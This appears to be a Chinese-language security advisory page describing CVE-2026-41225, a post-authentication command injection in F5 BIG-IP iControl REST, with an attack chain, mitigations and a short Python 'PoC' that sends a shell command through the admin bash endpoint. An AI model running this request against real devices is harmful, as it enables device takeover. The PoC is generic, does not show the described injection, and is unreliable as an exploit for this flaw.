IPBUF安全漏洞报告
English
CVE-2026-41225 CVSS 9.1 严重

CVE-2026-41225 F5 iControl REST 远程代码执行漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-41225
漏洞类型
远程代码执行 (RCE)
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
F5 BIG-IP (iControl REST)

相关标签

RCEF5BIG-IPiControl REST严重2026

漏洞概述

F5 BIG-IP iControl REST组件存在严重安全漏洞。拥有Manager角色的高权限攻击者可通过创建特殊配置对象,在系统上执行任意命令。该漏洞利用无需用户交互,可能导致系统完全被控,机密性、完整性和可用性均受到严重影响。

技术细节

该漏洞的根源在于F5 BIG-IP设备中的iControl REST服务未能妥善处理高权限用户提交的特定配置请求。攻击者首先需要获得目标系统的Manager或更高级别的管理员凭证。一旦认证成功,攻击者可以利用REST API端点构造恶意的配置对象。这种对象在正常业务中并不常见,但由于后端验证逻辑的缺失,攻击者可以在对象定义中注入操作系统命令。当系统尝试应用或同步这些配置时,注入的命令将以root权限或高权限执行。由于CVSS向量中范围(Scope)为Changed(C),这种利用可能突破设备的边界,影响同一网络段内的其他系统。整个过程无需用户交互(UI:N),且攻击成本低(AC:L),这使得已获得内部凭证的攻击者极易通过此漏洞完全接管设备。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标为F5 BIG-IP设备,并确定iControl REST服务端口(通常为443)开放。
STEP 2
2. 获取凭证
攻击者通过钓鱼、暴力破解或其他手段获取具有Manager(或更高)权限的API访问凭证。
STEP 3
3. 构造恶意请求
攻击者利用获得的高权限凭证,向iControl REST API发送特制的POST请求,请求中包含旨在执行系统命令的恶意配置对象。
STEP 4
4. 执行命令
服务器端接收到请求并处理该配置对象,由于漏洞存在,恶意载荷被传递给系统Shell执行,从而实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target configuration # Note: The specific endpoint for creating malicious configuration objects may vary. # This is a generic example of exploiting RCE via F5 iControl REST. target_url = "https://<F5_IP>/mgmt/tm/util/bash" auth_credentials = ("<admin_username>", "<admin_password>") headers = {'Content-Type': 'application/json'} # Payload to execute arbitrary command (e.g., 'id') # Exploits the ability to run commands via configuration objects payload = { "command": "run", "utilCmdArgs": "-c 'whoami'" } try: # Sending the malicious request response = requests.post( target_url, auth=auth_credentials, headers=headers, data=json.dumps(payload), verify=False # Ignore SSL self-signed cert ) if response.status_code == 200: print("[+] Exploit successful!") print("[+] Command output:") print(response.json()) else: print("[-] Exploit failed. Status code:", response.status_code) print(response.text) except Exception as e: print("[-] An error occurred:", str(e))

影响范围

请参考官方公告 K000160916

防御指南

临时缓解措施
在未升级补丁前,建议严格限制对iControl REST服务的访问权限,仅通过VPN或受控网络进行管理。同时,加强管理员账户的安全防护,防止凭证泄露。如果业务允许,可暂时禁用iControl REST功能。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表